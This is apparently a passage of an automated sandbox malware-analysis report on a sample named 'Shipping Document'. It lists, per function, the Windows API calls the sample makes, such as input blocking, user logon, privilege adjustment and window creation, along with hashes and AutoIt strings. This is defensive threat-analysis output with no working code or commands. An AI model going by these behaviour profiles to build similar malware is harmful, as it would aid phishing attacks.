                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9e9154e0abc5c7c91aa557e1e944423e9461b5ae10aaf95f0fbec6898406e1d6
                              • Instruction ID: dd51dfcd61b2fca17bc32c948e80d40c6eeec90229df8f61c43261cef8826180
                              • Opcode Fuzzy Hash: 9e9154e0abc5c7c91aa557e1e944423e9461b5ae10aaf95f0fbec6898406e1d6
                              • Instruction Fuzzy Hash: 1A22AD75E00216CFDB24DF58C682BAABBB0FF04310F14846DE9969B381D735A985EB91
                              APIs
                              • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 01024F55
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: mouse_event
                              • String ID: DOWN
                              • API String ID: 2434400541-711622031
                              • Opcode ID: 88bbd8902e5fa89b9fda8dd0d1e4af77c0054c08023beb91385a65d191e85fca
                              • Instruction ID: 1f014c770f08fdc9cab9f959315ed8c185247ca3a4ed43ac93b13e6c385a40f5
                              • Opcode Fuzzy Hash: 88bbd8902e5fa89b9fda8dd0d1e4af77c0054c08023beb91385a65d191e85fca
                              • Instruction Fuzzy Hash: 47E0CD7555C7B23CB99425197C0FEF713CC8B52131F11028AF990D50C1ED992C8215FC
                              APIs
                              • FindFirstFileW.KERNEL32(?,?), ref: 0102C966
                              • FindClose.KERNEL32(00000000), ref: 0102C996
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Find$CloseFileFirst
                              • String ID:
                              • API String ID: 2295610775-0
                              • Opcode ID: 67155c26f9ed0075b050eaa3cd3876e890c3927671875a965440b7338ba93f84
                              • Instruction ID: 1f45282fd0ea2f80dc9cc3b2f6e7eab774d90da47bcc0048eace0ce2b81707d4
                              • Opcode Fuzzy Hash: 67155c26f9ed0075b050eaa3cd3876e890c3927671875a965440b7338ba93f84
                              • Instruction Fuzzy Hash: D9118E766046119FD710EF29D949A2AF7E9EF84324F00851EF8A9C7291DB78AC00CB81
                              APIs
                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0103977D,?,0104FB84,?), ref: 0102A302
                              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0103977D,?,0104FB84,?), ref: 0102A314
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: ErrorFormatLastMessage
                              • String ID:
                              • API String ID: 3479602957-0
                              • Opcode ID: ca9420f4a99797674ea6f41933d8bc993e2c81d4fb69159c02159e0a1a8d8d9a
                              • Instruction ID: f0804ff3c79286de3a0bdc51ba6936777327e160e4453cb8ce82ed3ffd2198db
                              • Opcode Fuzzy Hash: ca9420f4a99797674ea6f41933d8bc993e2c81d4fb69159c02159e0a1a8d8d9a
                              • Instruction Fuzzy Hash: 45F0893554422DE7D721AEA4CC49FEA776DBF08751F008155F948D7141DA749544CBE0
                              APIs
                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,01018851), ref: 01018728
                              • CloseHandle.KERNEL32(?,?,01018851), ref: 0101873A
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: AdjustCloseHandlePrivilegesToken
                              • String ID:
                              • API String ID: 81990902-0
                              • Opcode ID: ed9fd980ddadf9e24a054e73bcf359f05cc132cd3d8af9035c05b186c7e61e6e
                              • Instruction ID: 9dfc3e782e16a8657f64e9e64431520e6eaafbd23fa0d38e975d88bc693af7a1
                              • Opcode Fuzzy Hash: ed9fd980ddadf9e24a054e73bcf359f05cc132cd3d8af9035c05b186c7e61e6e
                              • Instruction Fuzzy Hash: 06E04676000641EFE7712B26ED08D73BBE9FB003507108829B99680834CB36AC90EB10
                              APIs
                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00FE8F97,?,?,?,00000001), ref: 00FEA39A
                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00FEA3A3
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: ExceptionFilterUnhandled
                              • String ID:
                              • API String ID: 3192549508-0
                              • Opcode ID: b23b5e83bd0310d7bf37c586638e2c19fa78cace12fccb80073330dbeaeef515
                              • Instruction ID: bb07037f817804cbf8aa4bb7de2f176aa55bf24a310ff98fa8e38a3ff17c59e7
                              • Opcode Fuzzy Hash: b23b5e83bd0310d7bf37c586638e2c19fa78cace12fccb80073330dbeaeef515
                              • Instruction Fuzzy Hash: 16B092F505420AABCA102B99E949F883F68EB44AA3F408010F64D84054CBE754508B91
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 41c7f0d9b6f76d7cea05d41e13b6d5fbedc3f81df51fd5c028b973f7e4c003a1
                              • Instruction ID: c070a543e200d800b647d187868b197cd5f5db5df32a1f6975a7201d8b7f9c9b
                              • Opcode Fuzzy Hash: 41c7f0d9b6f76d7cea05d41e13b6d5fbedc3f81df51fd5c028b973f7e4c003a1
                              • Instruction Fuzzy Hash: BA323632D29F414DE7239535D832336B248AFB73D4F64D737E819B5A9AEB29C4836200
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d08bb0a4fcaf705f49e1e5cf49fc60980ce96e5a6b9f2d4c1b8fe4ad51e898dd
                              • Instruction ID: 0d2737b424c3f3b8bf0c082180b596ff412e1c33ab66e4382d2bfe6ce1c45cbb
                              • Opcode Fuzzy Hash: d08bb0a4fcaf705f49e1e5cf49fc60980ce96e5a6b9f2d4c1b8fe4ad51e898dd
                              • Instruction Fuzzy Hash: E4B1E030E2AF418DD72396398831337BA4CAFBB2C9B51D71BFC5675D26EB2685834240
                              APIs
                              • __time64.LIBCMT ref: 01028B25
                                • Part of subcall function 00FE543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,010291F8,00000000,?,?,?,?,010293A9,00000000,?), ref: 00FE5443
                                • Part of subcall function 00FE543A: __aulldiv.LIBCMT ref: 00FE5463
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Time$FileSystem__aulldiv__time64
                              • String ID:
                              • API String ID: 2893107130-0
                              • Opcode ID: c55a76a3161fe8746c6200d2aa0a72f8f566fb2d1cdf1c5484c00a0bd3c438f1
                              • Instruction ID: e6a5a543d70d21fd211ca2fa6a2d4479b1064ad8fde73c499f1e510e5a020b80
                              • Opcode Fuzzy Hash: c55a76a3161fe8746c6200d2aa0a72f8f566fb2d1cdf1c5484c00a0bd3c438f1
                              • Instruction Fuzzy Hash: A121E4726355108BC72ACF29D441B52B3E1EBA5311B288E6CD0F5CB2C0CA75B905CB94
                              APIs
                              • BlockInput.USER32(00000001), ref: 01034218
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: BlockInput
                              • String ID:
                              • API String ID: 3456056419-0
                              • Opcode ID: 8dc4da7184afaffe59b3542d5898895be3ce23dc97edade2c5d45a974bba17ba
                              • Instruction ID: 057f6bbf6f902cd9315162ad3a929c0d6feca6a0c073851e24507fb2fc40c282
                              • Opcode Fuzzy Hash: 8dc4da7184afaffe59b3542d5898895be3ce23dc97edade2c5d45a974bba17ba
                              • Instruction Fuzzy Hash: 5DE048752441159FC710DF59D945E5AF7DCAF94760F018019FC49DB352DAB4E8408B90
                              APIs
                              • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,010188D1), ref: 01018CB3
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: LogonUser
                              • String ID:
                              • API String ID: 1244722697-0
                              • Opcode ID: 516746485f31bde0765aec4314f03c09abeaaae3c4585bd144a212a6ce0d9265
                              • Instruction ID: 95a0c2074e34b002979582194e31d00a2a9b2ca88fd0ea86fc0e8266788f9588
                              • Opcode Fuzzy Hash: 516746485f31bde0765aec4314f03c09abeaaae3c4585bd144a212a6ce0d9265
                              • Instruction Fuzzy Hash: 3BD05E3226050EBBEF018EA8DD01EAF3B69EB04B01F408111FE15C5090C776D835AF60
                              APIs
                              • GetUserNameW.ADVAPI32(?,?), ref: 01002242
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: NameUser
                              • String ID:
                              • API String ID: 2645101109-0
                              • Opcode ID: ede4b890b138d629c709b3c38883c5fbfb9b19ea10fe06ac8a5f7046cb88eba4
                              • Instruction ID: f27273387535e839688edfc06459c46e087e07f49f4bd9144a6b12bc36de1914
                              • Opcode Fuzzy Hash: ede4b890b138d629c709b3c38883c5fbfb9b19ea10fe06ac8a5f7046cb88eba4
                              • Instruction Fuzzy Hash: 45C04CF5800109DBDB15DB90D688DEE77BCAB04304F104055A141F2140D7749B448B71
                              APIs
                              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00FEA36A
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: ExceptionFilterUnhandled
                              • String ID:
                              • API String ID: 3192549508-0
                              • Opcode ID: a1113394a7a91d3e62b39f446db0b4db96821a2d18792700748f43ce13ab6d97
                              • Instruction ID: e2acddabd37b928522f9286b3b6c77d078014bc10b01becd397146ab4cd442f0
                              • Opcode Fuzzy Hash: a1113394a7a91d3e62b39f446db0b4db96821a2d18792700748f43ce13ab6d97
                              • Instruction Fuzzy Hash: D4A012B000010DA78A001A45E8048447F5CD6005917008010F40C4001187B354104680
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f6f2d2eb0a29e12bd6fb37aebf3666dce712a56d3389c50b0a18be9d13c622cc
                              • Instruction ID: e64dadec69773dfd6c773c92505e3ba71bcf09e28e54a2cc95ef4aa78e124236
                              • Opcode Fuzzy Hash: f6f2d2eb0a29e12bd6fb37aebf3666dce712a56d3389c50b0a18be9d13c622cc
                              • Instruction Fuzzy Hash: BB224B31911116CBDF388F19D89467D77A2FB82394F2C846BD8829F395DB389D82DB60
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                              • Instruction ID: b08c72a7b92294e1b79326385b18db26e08267b162795b2396f407a8086ce651
                              • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                              • Instruction Fuzzy Hash: 76C190326051D309DF6D863B943413EBAE56AA27B131A0B6EE4B3CB5C5FF20D564F620
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                              • Instruction ID: 9dc724789f6c140d1813bd601d1322f2d832e42e1cc3633806d23a91e65c924a
                              • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                              • Instruction Fuzzy Hash: 50C1BF336051D30ADBAD463BD43413EBBE56AA27B131A176DE4B2CB4C5FF20D664B620
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                              • Instruction ID: ba0bcffb9c1b1587216c65a119040e6ca96b6c09160500111873c45e133ecc5a
                              • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                              • Instruction Fuzzy Hash: E9C16D326091D309DF2D463B943417EBAE17AA27B131A0B6DE8B2CB5D4EF30D564F660
                              APIs
                              • DeleteObject.GDI32(00000000), ref: 01037B70
                              • DeleteObject.GDI32(00000000), ref: 01037B82
                              • DestroyWindow.USER32 ref: 01037B90
                              • GetDesktopWindow.USER32 ref: 01037BAA
                              • GetWindowRect.USER32(00000000), ref: 01037BB1
                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 01037CF2
                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 01037D02
                              • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01037D4A
                              • GetClientRect.USER32(00000000,?), ref: 01037D56
                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 01037D90
                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01037DB2
                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01037DC5
                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01037DD0
                              • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01037DD9
                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01037DE8
                              • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01037DF1
                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01037DF8
                              • GlobalFree.KERNEL32(00000000), ref: 01037E03
                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01037E15
                              • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,01052CAC,00000000), ref: 01037E2B
                              • GlobalFree.KERNEL32(00000000), ref: 01037E3B
                              • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 01037E61
                              • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 01037E80
                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01037EA2
                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0103808F
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                              • String ID: $AutoIt v3$DISPLAY$static
                              • API String ID: 2211948467-2373415609
                              • Opcode ID: aaf0ab19ab341205bf071bd254bf8bfac9cadae145f1310b7c477f0b00fff8c6
                              • Instruction ID: a806223dea2b7766698c591388e88b9022bee6284c49b7afeff992ae8e258a9c
                              • Opcode Fuzzy Hash: aaf0ab19ab341205bf071bd254bf8bfac9cadae145f1310b7c477f0b00fff8c6
                              • Instruction Fuzzy Hash: 310291B590011AEFDB24DFA8DD89EAE7BB9FF48310F048158F945AB295CB759D00CB60
                              APIs
                              • CharUpperBuffW.USER32(?,?,0104F910), ref: 010438AF
                              • IsWindowVisible.USER32(?), ref: 010438D3
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: BuffCharUpperVisibleWindow
                              • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                              • API String ID: 4105515805-45149045
                              • Opcode ID: 1a3d27777b9f109d2aa48a65ad20f8c7ad465acc97dea38d97735c127f4793ca
